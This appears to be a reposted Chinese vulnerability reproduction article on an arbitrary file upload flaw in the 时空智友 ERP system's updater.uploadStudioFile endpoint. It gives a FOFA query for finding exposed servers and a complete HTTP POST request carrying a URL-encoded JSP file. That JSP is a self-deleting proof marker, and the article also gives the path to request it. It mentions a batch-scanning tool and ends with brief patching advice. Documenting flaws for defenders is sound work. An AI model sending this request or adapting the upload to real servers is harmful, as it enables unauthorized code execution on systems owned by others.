免责声明
请勿使用本文中提到的技术进行非法测试或行为。使用本文中提供的信息或工具所造成的任何后果和损失由使用者自行承担,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。
一、简介
时空智友ERP系统是一款基于云计算和大数据的企业资源计划管理系统,旨在提高企业的运营效率、减少成本,并增强决策能力。该系统覆盖财务、供应链、生产、库存、人力资源和客户关系等多个领域,具备实时数据分析和业务智能功能,帮助企业灵活应对市场变化。# 二、使用步骤
二、漏洞描述
时空智友ERP系统updater.uploadStudioFile存在任意文件上传漏洞,攻击者可利用该漏洞上传恶意软件,获取对服务器的远程访问权限或者破坏系统。
三、fofa语法
body="login.jsp?login=null"
四、漏洞复现
POST /formservice?service=updater.uploadStudioFile HTTP/1.1
Host: IP
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Priority: u=0, i
Content-Type: application/x-www-form-urlencoded
Content-Length: 484
content=<?xml%20version="1.0"?><root><filename>test.jsp</filename><filepath>./</filepath><filesize>172</filesize><lmtime>2020-10-01%2008:00:00</lmtime></root><!--%3c%25%20%6f%75%74%2e%70%72%69%6e%74%6c%6e%28%22%31%32%33%34%35%36%22%29%3b%6e%65%77%20%6a%61%76%61%2e%69%6f%2e%46%69%6c%65%28%61%70%70%6c%69%63%61%74%69%6f%6e%2e%67%65%74%52%65%61%6c%50%61%74%68%28%72%65%71%75%65%73%74%2e%67%65%74%53%65%72%76%6c%65%74%50%61%74%68%28%29%29%29%2e%64%65%6c%65%74%65%28%29%3b%20%25%3e-->
访问http://ip/update/temp/studio/test.jsp
批量检测(工具链接在知识星球):
五、修复建议
1、禁⽌公⽹访问该系统。
2、及时升级产品到最新版本。
网安交流群
原文始发于微信公众号(白帽攻防):【漏洞复现】时空智友ERP系统uploadStudioFile任意文件上传漏洞
标签:zh,image,uploadStudioFile,漏洞,空智,ERP From: https://blog.csdn.net/m0_46381222/article/details/143319717